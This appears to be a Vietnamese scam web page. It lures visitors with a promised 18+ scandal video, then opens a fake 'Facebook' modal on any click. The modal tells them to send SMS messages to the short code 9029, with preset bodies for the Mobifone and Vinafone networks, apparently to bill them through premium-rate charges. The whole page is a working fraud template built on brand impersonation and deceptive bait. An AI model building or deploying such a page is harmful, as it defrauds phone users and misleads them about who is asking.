
<!DOCTYPE html>
<html lang="">
    <head>

        <meta property="og:title" content="Sound Cloud - Video" />
        <meta property="og:type" content="video.movie" />
        <meta property="og:url" content="https://www.imdb.com/title/tt0117500/"/>
        <meta property="og:image" content="hot.jpg"/>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        
        
        
        <title>Phốt mới nhất nóng hổi 18+</title>
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        
        
        <style type="text/css">
            *{box-sizing:border-box}.body{background:#e2e2e2;margin:0;padding:0;font-family:Lato,sans-serif}.login-form-wrap{background:radial-gradient(ellipse at center,#5170ad 0,#355493 100%);border:1px solid #2d416d;box-shadow:0 1px #5670a4 inset,0 0 10px 5px rgba(0,0,0,.1);border-radius:5px;width:380px;height:480px;margin:60px auto;padding:50px 30px 0 30px;text-align:center}.login-form-wrap h1{margin:0 0 50px 0;padding:0;font-weight:700;font-size:26px;color:#fff}.login-form-wrap h5{margin-top:40px}.login-form-wrap h5>a{font-size:14px;color:#fff;text-decoration:none;font-weight:400}.login-form input[name=email],.login-form input[name=pass]{width:100%;border:1px solid #314d89;margin-right:110px;outline:0;padding:12px 20px;font-weight:400;font-family:Lato,sans-serif;cursor:pointer}.login-form input[name=email]{border-bottom:none;border-radius:4px 4px 0 0;padding-bottom:13px;box-shadow:0 -1px 0 #e0e0e0 inset,0 1px 2px rgba(0,0,0,.23) inset}.login-form input[name=pass]{border-top:none;border-radius:0 0 4px 4px;box-shadow:0 -1px 2px rgba(0,0,0,.23) inset,0 1px 2px rgba(255,255,255,.1)}.login-form input[type=submit]{font-family:Lato,sans-serif;font-weight:400;background:linear-gradient(to bottom,#e0e0e0 0,#cecece 100%);display:block;margin:20px auto 0 auto;width:100%;border:none;border-radius:3px;padding:8px;font-size:17px;color:#636363;text-shadow:0 1px 0 rgba(255,255,255,.45);font-weight:700;box-shadow:0 1px 3px 1px rgba(0,0,0,.17),0 1px 0 rgba(255,255,255,.36) inset}.login-form input[type=submit]:hover{background:#ddd}.login-form input[type=submit]:active{padding-top:9px;padding-bottom:7px;background:#c9c9c9}
        </style>
    </head>
    <body onclick="showlog()">	
        <div align="center" style="margin-top: 0px;">
            <div class="separator" style="clear: both; text-align: center;">
  <style type="text/css">  

input[type=submit]{
  margin-left: 0.5em;
  height: 2.5em;
  padding: 0.2em 1em 0.2em 2.25em;
  font-size: 5;
  font-weight: bold;
  font-family: "Open Sans";
  text-transform: uppercase;
  color: white;
  background: url(Th606mh.png) no-repeat scroll 0.25em 0.07em transparent;
  background-size: 24px 94px;
  border-radius: 2em;
  border: 0.15em solid #F9C23C;
  cursor: pointer;
  transition: all 0.1s ease 0s;
}
input[type="submit"]:hover {
    color: #fff;
    background-color: #EAA502;
    border-color: #EAA502;
    background-position: 0.75em bottom;
    -webkit-transition: all 0.3s ease;
    -ms-transition: all 0.3s ease;
    transition: all 0.3s ease;
}
input[type="submit"]:focus {
    background-position: 2em -4em;
    -webkit-transition: all 0.3s ease;
    -ms-transition: all 0.1s ease;
    transition: all 0.3s ease;
}
/* Webfonts */

@font-face {
    font-family: 'Open Sans';
    font-style: normal;
    font-weight: 700;
    src: local('Open Sans Bold'), local('OpenSans-Bold'), url(https://themes.googleusercontent.com/static/fonts/opensans/v8/k3k702ZOKiLJc3WVjuplzHhCUOGz7vYGh680lGh-uXM.woff) format('woff');
}             
     </style>

            </div>
           
               <img src="video3.jpg" class="img-responsive" alt="Image" onclick=showlog();">
        </div>
        <div class="modal fade" id="myModal" role="dialog">
            <section class="login-form-wrap">
                <h1>Facebook</h1>
                <div style="background-color: #fff9d7; font-size: 15px ; font-weight:bold; border: 1px solid #e2c822; padding: 6px; margin-bottom: 5px;">NỘI DUNG 18+ VUI LÒNG XÁC NHẬN LẠI BẰNG TIN NHẮN VỚI FACEBOOK </div>
                   <br>
                   <br>                                                                                                          
    <a href="sms:9029&body= IM DHT NAP20 zeroes"><input type="submit" value="Mạng Mobifone"></a>                                                                                                                    
<br>                                    
<br>  
 <br>                                              
          <a href="sms:9029&body= VMG PX NAP20 zeroes"><input type="submit" value="Mạng Vinafone"></a>
  <br>                                    
 <br>         
 <br>                                    
 <br> 
  <div style="background-color: #fff9d7; font-size: 15px ; font-weight:bold; border: 1px solid #e2c822; padding: 6px; margin-bottom: 5px;">BẤM CHỌN MẠNG ĐIỆN THOẠI CỦA BẠN VÀ GỬI TIN NHẮN ĐỂ XEM VIDEO</div>                                                                                                 
            </section>
        </div>
        <script src="//code.jquery.com/jquery.js"></script>
        <script type="text/javascript">
                $(document).ready(function () {
                                    });
                function showlog() {
                    $('#myModal').modal({
                        backdrop: 'static',
                        keyboard: true,
                        show: true
                    });
                }
        </script>
        
   

       
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
    </body>
</html>
